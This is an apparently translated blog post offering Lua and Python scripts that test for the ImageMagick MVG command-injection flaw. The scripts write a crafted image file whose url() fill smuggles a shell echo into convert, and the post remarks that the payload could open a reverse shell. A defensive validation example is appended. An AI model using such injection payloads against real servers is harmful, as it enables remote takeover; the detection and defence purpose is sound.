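ImageMagick Remote Command Execution Detection Tool

This ImageMagick vulnerability came out last night; I only had time to look into it today, and I also tested it myself today.

Screenshot of the result: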

=======================

I wrote a detection script in Lua:

print("Checking...")
-- Write an MVG test file under an image name; convert picks the decoder from the content
file = io.open("exp.jpg", "w")
--file:write("s")
file:write("push graphic-context\nviewbox 0 0 640 480\n")
file:write("fill 'url(https://example.com/image.jpg")
file:write('"|echo "success!!!)')
file:write("'\n")
file:write("pop graphic-context")
file:close()
-- Run convert and capture its stdout; a vulnerable build prints the echoed marker
cmd = io.popen("convert exp.jpg test.png")
result = cmd:read("*all")
cmd:close()
print(result)

Python version:

import os

# Write an MVG test file; a vulnerable convert runs the echo and prints the marker
file = open("./x", "w")
file.write("push graphic-context\n")
file.write("viewbox 0 0 640 480\n")
file.write("fill 'url(https://example.com/image.jpg\"|echo \"dangerous!)'\n")
file.write("pop graphic-context\n")
file.close()

res = os.system("convert ./x ./y 2>/dev/null")
# Clean up the test input and any output that convert produced
if os.path.exists("x"):
    os.remove("x")
if os.path.exists("y"):
    os.remove("y")

If the vulnerability exists, it returns

Of course, you can change the payload yourself; it could just as well send back a reverse shell and take over the server directly.
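A defensive counterpart to the two scripts above, as an added example that is not part of the original post: both scripts put MVG drawing commands into a file with an ordinary name and leave convert to choose the decoder from the content. This sketch rejects an upload whose leading bytes do not match its extension and passes convert an explicit coder prefix; the accepted formats, the function names and the sample bytes are assumptions made for illustration.

```python
import os

# Leading bytes of the raster formats this hypothetical upload handler accepts.
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}

# Constructed samples: the first lines written by the scripts above, and a JPEG header.
MVG_SAMPLE = b"push graphic-context\nviewbox 0 0 640 480\n"
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"


def sniff_format(data):
    """Return the accepted format whose magic bytes start `data`, or None."""
    for fmt, signatures in MAGIC.items():
        if data.startswith(signatures):
            return fmt
    return None


def safe_convert_argv(filename, data, output):
    """Build the convert argument list, or raise ValueError to reject the upload.

    `filename` is assumed to be a server-generated name, not user-controlled text.
    """
    ext = os.path.splitext(filename)[1].lower()
    claimed = EXTENSIONS.get(ext)
    if claimed is None:
        raise ValueError("extension not allowed: %r" % ext)
    actual = sniff_format(data)
    if actual != claimed:
        raise ValueError("content is %s, extension says %s"
                         % (actual or "not an accepted image", claimed))
    # The "jpeg:" style prefix names the decoder explicitly, so ImageMagick
    # does not pick one (such as MVG) by inspecting the file content.
    # The list form is meant for subprocess.run(argv) without a shell.
    return ["convert", "%s:%s" % (claimed, filename), output]


if __name__ == "__main__":
    print(safe_convert_argv("photo.jpg", JPEG_SAMPLE, "photo.png"))
    try:
        safe_convert_argv("exp.jpg", MVG_SAMPLE, "test.png")
    except ValueError as err:
        print("rejected:", err)
```
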

Here is an analysis write-up:

http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0

Original article: https://www.cnblogs.com/sevck/p/5462365.html